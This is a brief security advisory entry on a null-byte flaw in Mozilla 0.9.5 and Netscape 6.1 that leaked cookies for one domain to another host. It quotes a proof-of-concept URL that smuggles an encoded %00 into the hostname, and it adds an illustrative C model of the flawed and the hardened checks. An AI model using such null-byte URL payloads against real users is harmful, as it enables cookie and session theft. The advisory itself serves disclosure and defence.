COMMAND

Mozilla leaks cookies

SYSTEMS AFFECTED

Mozilla 0.9.5 build 2001111503 and 0.9.5 build 20011012
Netscape 6.1

PROBLEM

In Marc Slemko's advisory [http://alive.znep.com/~marcs/security] :

--snip--

Loading a URL such as:

    http://alive.znep.com%00www.passport.com/cgi-bin/cookies

...will cause Mozilla to connect to the hostname specified before the "%00", but send the cookies to the server based on the entire hostname. The "%00" is the URL encoded version of the null character, used in C to terminate strings.

--snap--

SOLUTION

Update to Netscape 6.2.1 or Mozilla 0.9.7
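
The mismatch described in the advisory, as an added C example that is not Mozilla's code and not part of the advisory: a simplified model in which cookie selection looks at every decoded byte of the host while the connection uses the C-string view, beside a hardened check that rejects embedded NULs. The function names, the 256-byte buffer and the suffix-matching rule are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative model only (assumed names and logic, not Mozilla source).
   Percent-decode src into dst. Returns the decoded length, which can span
   embedded NUL bytes, or (size_t)-1 on malformed input or overflow. */
size_t pct_decode(const char *src, char *dst, size_t cap) {
    size_t n = 0;
    while (*src) {
        if (n + 1 >= cap) return (size_t)-1;
        if (*src != '%') { dst[n++] = *src++; continue; }
        if (!isxdigit((unsigned char)src[1]) || !isxdigit((unsigned char)src[2]))
            return (size_t)-1;
        char hex[3] = { src[1], src[2], '\0' };
        dst[n++] = (char)strtol(hex, NULL, 16);
        src += 3;
    }
    dst[n] = '\0';
    return n;
}

/* Length-aware suffix match: does a cookie for `domain` apply to this host? */
int domain_matches(const char *host, size_t len, const char *domain) {
    size_t dlen = strlen(domain);
    if (len < dlen || memcmp(host + len - dlen, domain, dlen) != 0) return 0;
    return len == dlen || host[len - dlen - 1] == '.';
}

/* Flawed model: cookies are picked from all decoded bytes, the connection
   from the C-string view that stops at the first NUL. 1 = cookie leaks. */
int leaks_cookie(const char *encoded_host, const char *domain) {
    char buf[256];
    size_t len = pct_decode(encoded_host, buf, sizeof buf);
    if (len == (size_t)-1) return 0;
    return domain_matches(buf, len, domain) &&
           !domain_matches(buf, strlen(buf), domain);
}

/* Hardened model: a decoded host containing NUL is rejected, so the
   connection and the cookie lookup can never see different names. */
int cookie_allowed(const char *encoded_host, const char *domain) {
    char buf[256];
    size_t len = pct_decode(encoded_host, buf, sizeof buf);
    if (len == (size_t)-1 || memchr(buf, '\0', len) != NULL) return 0;
    return domain_matches(buf, len, domain);
}
```

With the host from the advisory, `leaks_cookie` reports the mismatch and `cookie_allowed` refuses the request, while an ordinary host such as `www.passport.com` is unaffected.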